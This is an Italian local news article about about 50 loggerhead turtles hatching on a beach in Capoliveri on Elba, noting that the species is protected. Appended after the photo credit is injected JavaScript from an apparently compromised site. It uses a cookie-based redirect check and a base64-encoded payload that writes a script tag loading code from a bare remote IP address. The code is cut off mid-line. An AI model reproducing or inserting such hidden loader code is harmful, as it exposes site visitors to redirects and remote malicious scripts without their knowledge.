Se dovessimo pensare a un evento straordinario che la natura ci ha regalato, in questa estate elbana, non possiamo che riferirci alla nascita di 50 splendide creature del mare.
Anche quest’anno si è ripetuta una magia, un esemplare di Caretta caretta, ha scelto l’Elba per dare alla luce i suoi piccoli.
Era capitato già lo scorso anno sulla spiaggia di Marina di Campo con la nascita di 103 tartarughe monitorate giorno e notte prima della schiusa delle uova. La grande “Federica” aveva fatto emozionare tutta l’Italia con questo evento.
Quest’anno la magia si è ripetuta sulla spiaggia di Straccoligno, a Capoliveri, sotto gli occhi increduli dei bagnanti che hanno visto spuntare, sotto un telo mare, questi simpatici rettili marini. Al contrario dello scorso anno, non si era a conoscenza della presenza del nido (le tartarughe depongono prevalentemente nelle ore notturne) e quindi lo stupore è stato ancora più grande.
Ci auguriamo che le piccole creature del mare che avranno nuotato continuamente per 24 ore per arrivare in alto mare in zone ricche di nutrimento, adesso siano salve nel loro ambiente naturale.
Per maggiori informazioni sull’evento contattare l’Osservatorio Toscano per la Biodiversità e il Parco Nazionale Arcipelago Toscano
La Caretta caretta , rettile marino, è considerata una specie endangered (specie a rischio) ed è perciò protetta da normative internazionali e da numerose convenzioni, in particolare la Convenzione di Barcellona.
Ph di Stefano Luzzetti
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘